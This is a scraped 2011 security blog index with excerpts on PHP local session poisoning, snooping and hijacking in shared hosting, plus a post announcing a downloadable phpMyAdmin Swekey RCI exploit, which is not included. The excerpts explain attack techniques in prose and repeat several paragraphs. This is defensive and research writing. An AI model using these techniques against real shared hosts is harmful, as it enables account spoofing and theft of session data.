By default Suhosin transparently encrypts session files stored by PHP. This seems to be adequate protection against local session poisoning in a shared hosting environment. But let's take a closer look.
Thursday, September 29, 2011
Thursday, September 15, 2011
Local Session Poisoning in PHP Part 2: Promiscuous Session Files
FastCGI, suPHP and suExec can all ensure that a PHP script which is called from the web will execute under the user that owns it, as opposed to the user the web server is running as. This seemingly protects against session poisoning by ensuring that a malicious user no longer can open and manipulate session files owned by other users in a shared host.
The hidden pitfall is that while these protection mechanisms protect session files from unauthorized access, they can not prevent a user from authorizing others to access its session files. If all the session files are stored in a common folder it is trivial to trick a web application into loading session variables from a promiscuous session file.
The hidden pitfall is that while these protection mechanisms protect session files from unauthorized access, they can not prevent a user from authorizing others to access its session files. If all the session files are stored in a common folder it is trivial to trick a web application into loading session variables from a promiscuous session file.
Etiketter:
local,
php,
php sessions,
POC,
session poisoning
Wednesday, September 7, 2011
Local Session Poisoning in PHP Part 1: The Basics of Exploitation and How to Secure a Server
Session poisoning is the act of manipulating sessions specific data in PHP. To add, change or remove variables stored in the super global $_SESSION array.
Local session poisoning is enabled by the fact that one web application can manipulate a variable in the $_SESSION array while another web application has no way of knowing how that variable's value came to be, and will interpret the variable according to its own logic. The $_SESSION array can then be manipulated to contain the values needed to spoof a logged in user or exploit a vulnerable function. PHP programmers put far more trust in $_SESSION variables than for example $_GET variables. The $_SESSION array is considered an internal variable, and an internal variable would never contain malicious input, would it?
Local session poisoning is enabled by the fact that one web application can manipulate a variable in the $_SESSION array while another web application has no way of knowing how that variable's value came to be, and will interpret the variable according to its own logic. The $_SESSION array can then be manipulated to contain the values needed to spoof a logged in user or exploit a vulnerable function. PHP programmers put far more trust in $_SESSION variables than for example $_GET variables. The $_SESSION array is considered an internal variable, and an internal variable would never contain malicious input, would it?
Wednesday, August 10, 2011
Local Session Snooping in PHP
Local session snooping is not as much a security issue as a way of gathering information from an already compromised web application. Unless it is a badly configured shared host where an attacker might gather otherwise unobtainable information. It's basically about extracting all the information a web application stored in the super global $_SESSION variable.
Nevertheless, it is easy. The one thing needed is a session id (the value of the PHPSESSID cookie). If the host uses PHP's default session handler, these could easily be enumerated as in the POC further down in this post.
Nevertheless, it is easy. The one thing needed is a session id (the value of the PHPSESSID cookie). If the host uses PHP's default session handler, these could easily be enumerated as in the POC further down in this post.
Thursday, August 4, 2011
Local Session Hijacking in PHP
Recently I discovered that the shared hosting provider I sometimes use is susceptible to this age-old technique that everyone really should know about by now.
PHP's default session handler stores session data in files. And by default these files are placed in /tmp. In a shared enviroment session files should never be placed in a directory that can be read by a malicious local user like the world readable /tmp directory.
PHP's default session handler stores session data in files. And by default these files are placed in /tmp. In a shared enviroment session files should never be placed in a directory that can be read by a malicious local user like the world readable /tmp directory.
Friday, July 29, 2011
Encrypt.se New Feature: Key exchange
Encrypt.se is a small tool that helps anyone to easily send encrypted messages. There is no registration, no cookies, no hassle.
Read more about it in this previous post: http://ha.xxor.se/2011/07/encryptse-beta-open-for-public.html
The Key Exchange feature enables users of Encrypt.se to communicate their secret crypto key to their friends over the phone, even if someone might be listening.
Read more about it in this previous post: http://ha.xxor.se/2011/07/encryptse-beta-open-for-public.html
The Key Exchange feature enables users of Encrypt.se to communicate their secret crypto key to their friends over the phone, even if someone might be listening.
Saturday, July 9, 2011
phpMyAdmin 3.x Swekey RCI Exploit
Someone else submitted a working python exploit to exploit-db. It's already out there so I might as well publish my original exploit written in PHP.
2011-07-20 - Fixed some bugs in the exploit.
Download here
2011-07-20 - Fixed some bugs in the exploit.
Download here
Subscribe to:
Posts (Atom)